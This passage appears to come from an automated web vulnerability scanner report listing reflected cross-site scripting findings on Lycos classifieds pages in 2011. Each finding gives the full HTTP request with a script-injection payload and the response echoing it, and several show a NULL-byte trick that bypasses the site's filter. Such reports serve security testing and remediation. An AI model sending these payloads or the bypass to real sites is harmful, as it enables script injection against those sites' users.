1.219. http://classifieds.lycos.com/vehicle-car-mini_van/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-mini_van/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14e32"><script>alert(1)</script>3f1c6acac78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-car-mini_van14e32"><script>alert(1)</script>3f1c6acac78/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:14:51 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:14:51 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-mini_van14e32"><script>alert(1)</script>3f1c6acac78/?mobile=1" rel="nofollow">
...[SNIP]...

1.220. http://classifieds.lycos.com/vehicle-car-mini_van/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-mini_van/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e995"><script>alert(1)</script>11a9fa7813b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-car-mini_van/?3e995"><script>alert(1)</script>11a9fa7813b=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:14:18 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:14:18 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 93840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-mini_van/?3e995"><script>alert(1)</script>11a9fa7813b=1&mobile=1" rel="nofollow">
...[SNIP]...

1.221. http://classifieds.lycos.com/vehicle-car-sedan/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-sedan/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3b74"><script>alert(1)</script>2118badbcb7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-car-sedane3b74"><script>alert(1)</script>2118badbcb7/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:00:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:56 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-sedane3b74"><script>alert(1)</script>2118badbcb7/?mobile=1" rel="nofollow">
...[SNIP]...

1.222. http://classifieds.lycos.com/vehicle-car-sedan/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-sedan/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6df4c"><script>alert(1)</script>2dade4d62cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-car-sedan/?6df4c"><script>alert(1)</script>2dade4d62cc=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:00:00 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:00 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 107258

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-sedan/?6df4c"><script>alert(1)</script>2dade4d62cc=1&mobile=1" rel="nofollow">
...[SNIP]...

1.223. http://classifieds.lycos.com/vehicle-car-sedan/2011-honda-accord-23730-00-2416142889 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-sedan/2011-honda-accord-23730-00-2416142889

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af05e"><script>alert(1)</script>60e208c437b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-car-sedanaf05e"><script>alert(1)</script>60e208c437b/2011-honda-accord-23730-00-2416142889 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 14:59:48 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:48 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17817

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-sedanaf05e"><script>alert(1)</script>60e208c437b/2011-honda-accord-23730-00-2416142889?mobile=1" rel="nofollow">
...[SNIP]...

1.224. http://classifieds.lycos.com/vehicle-car-sedan/2011-honda-accord-23730-00-2416142889 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-sedan/2011-honda-accord-23730-00-2416142889

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0032914"><script>alert(1)</script>16bd371041b was submitted in the REST URL parameter 2. This input was echoed as 32914"><script>alert(1)</script>16bd371041b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /vehicle-car-sedan/2011-honda-accord-23730-00-2416142889%0032914"><script>alert(1)</script>16bd371041b HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:00:40 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:40 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-sedan/2011-honda-accord-23730-00-2416142889%0032914"><script>alert(1)</script>16bd371041b?mobile=1" rel="nofollow">
...[SNIP]...

1.225. http://classifieds.lycos.com/vehicle-car-sedan/2011-honda-accord-23730-00-2416142889 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-sedan/2011-honda-accord-23730-00-2416142889

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9c80"><script>alert(1)</script>6d947060cf8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-car-sedan/2011-honda-accord-23730-00-2416142889?b9c80"><script>alert(1)</script>6d947060cf8=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:59:19 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:19 GMT; path=/
Set-Cookie: classifieds[lastpage][0][category]=vehicle%2Fcar%2Fsedan; path=/
Set-Cookie: classifieds[lastpage][0][name]=Sedans; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24791

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-sedan/2011-honda-accord-23730-00-2416142889?b9c80"><script>alert(1)</script>6d947060cf8=1&mobile=1" rel="nofollow">
...[SNIP]...

1.226. http://classifieds.lycos.com/vehicle-car-sedan/2011-honda-accord-24480-00-2416142887 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-sedan/2011-honda-accord-24480-00-2416142887

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f126a"><script>alert(1)</script>9913767c13f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-car-sedanf126a"><script>alert(1)</script>9913767c13f/2011-honda-accord-24480-00-2416142887 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 14:59:56 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:56 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17817

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-sedanf126a"><script>alert(1)</script>9913767c13f/2011-honda-accord-24480-00-2416142887?mobile=1" rel="nofollow">
...[SNIP]...

1.227. http://classifieds.lycos.com/vehicle-car-sedan/2011-honda-accord-24480-00-2416142887 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-sedan/2011-honda-accord-24480-00-2416142887

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f7f14"><script>alert(1)</script>cef468bc4e7 was submitted in the REST URL parameter 2. This input was echoed as f7f14"><script>alert(1)</script>cef468bc4e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /vehicle-car-sedan/2011-honda-accord-24480-00-2416142887%00f7f14"><script>alert(1)</script>cef468bc4e7 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:00:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:57 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-sedan/2011-honda-accord-24480-00-2416142887%00f7f14"><script>alert(1)</script>cef468bc4e7?mobile=1" rel="nofollow">
...[SNIP]...

1.228. http://classifieds.lycos.com/vehicle-car-sedan/2011-honda-accord-24480-00-2416142887 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-sedan/2011-honda-accord-24480-00-2416142887

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94981"><script>alert(1)</script>7d681b86df3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-car-sedan/2011-honda-accord-24480-00-2416142887?94981"><script>alert(1)</script>7d681b86df3=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:59:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:24 GMT; path=/
Set-Cookie: classifieds[lastpage][0][category]=vehicle%2Fcar%2Fsedan; path=/
Set-Cookie: classifieds[lastpage][0][name]=Sedans; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24801

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-sedan/2011-honda-accord-24480-00-2416142887?94981"><script>alert(1)</script>7d681b86df3=1&mobile=1" rel="nofollow">
...[SNIP]...

1.229. http://classifieds.lycos.com/vehicle-car-sedan/2011-honda-civic-19905-00-2416144203 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-sedan/2011-honda-civic-19905-00-2416144203

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 114aa"><script>alert(1)</script>9b2b6d60c7d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-car-sedan114aa"><script>alert(1)</script>9b2b6d60c7d/2011-honda-civic-19905-00-2416144203 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 14:59:53 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:53 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-sedan114aa"><script>alert(1)</script>9b2b6d60c7d/2011-honda-civic-19905-00-2416144203?mobile=1" rel="nofollow">
...[SNIP]...

1.230. http://classifieds.lycos.com/vehicle-car-sedan/2011-honda-civic-19905-00-2416144203 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-sedan/2011-honda-civic-19905-00-2416144203

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %003d11a"><script>alert(1)</script>7130122b1d6 was submitted in the REST URL parameter 2. This input was echoed as 3d11a"><script>alert(1)</script>7130122b1d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /vehicle-car-sedan/2011-honda-civic-19905-00-2416144203%003d11a"><script>alert(1)</script>7130122b1d6 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:00:47 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:47 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-sedan/2011-honda-civic-19905-00-2416144203%003d11a"><script>alert(1)</script>7130122b1d6?mobile=1" rel="nofollow">
...[SNIP]...

1.231. http://classifieds.lycos.com/vehicle-car-sedan/2011-honda-civic-19905-00-2416144203 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-sedan/2011-honda-civic-19905-00-2416144203

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38e66"><script>alert(1)</script>328e80c3280 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-car-sedan/2011-honda-civic-19905-00-2416144203?38e66"><script>alert(1)</script>328e80c3280=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:59:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:13 GMT; path=/
Set-Cookie: classifieds[lastpage][0][category]=vehicle%2Fcar%2Fsedan; path=/
Set-Cookie: classifieds[lastpage][0][name]=Sedans; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/vehicle-car-sedan/2011-honda-civic-19905-00-2416144203?38e66"><script>alert(1)</script>328e80c3280=1&mobile=1" rel="nofollow">
...[SNIP]...

1.232. http://classifieds.lycos.com/vehicle-car-suv/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /vehicle-car-suv/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23f0c"><script>alert(1)</script>689aeb97041 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle-car-suv23f0c"><script>alert(1)</script>689aeb97041/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:15:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:14 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
